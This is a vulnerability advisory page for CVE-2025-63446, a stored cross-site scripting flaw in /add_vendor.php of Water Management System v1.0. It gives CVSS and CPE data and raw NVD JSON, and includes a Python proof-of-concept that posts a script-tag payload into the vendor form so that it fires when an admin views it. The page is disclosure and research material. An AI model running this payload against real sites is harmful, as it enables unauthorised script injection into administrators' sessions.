Security Vulnerability Report
中文
CVE-2025-63446 CVSS 6.1 MEDIUM

CVE-2025-63446

Published: 2025-11-03 16:15:37
Last Modified: 2025-11-10 16:03:07

Description

Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /add_vendor.php.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Water Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63446 PoC - Stored XSS in Water Management System v1.0 # Target: /add_vendor.php def exploit_xss(target_url): """ Exploit for CVE-2025-63446: Stored XSS in Water Management System Target: /add_vendor.php """ # Malicious JavaScript payload payload = { 'vendor_name': '<script>alert("XSS Vulnerability - CVE-2025-63446")</script>', 'vendor_email': '[email protected]', 'vendor_phone': '1234567890', 'vendor_address': 'Attacker Address', 'submit': 'Add Vendor' } try: # Send POST request to add_vendor.php response = requests.post( f'{target_url}/add_vendor.php', data=payload, timeout=10 ) if response.status_code == 200: print('[+] XSS payload sent successfully') print('[+] Payload stored in database') print('[+] When admin views vendor list, script will execute') print('[+] Check browser console for alert popup') else: print('[-] Failed to send payload') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') if __name__ == '__main__': if len(sys.argv) != 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://target.com') sys.exit(1) target = sys.argv[1].rstrip('/') exploit_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63446", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:36.620", "lastModified": "2025-11-10T16:03:06.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /add_vendor.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C58F1E69-BA8D-4995-BB68-311AC61B76C7"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-7", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}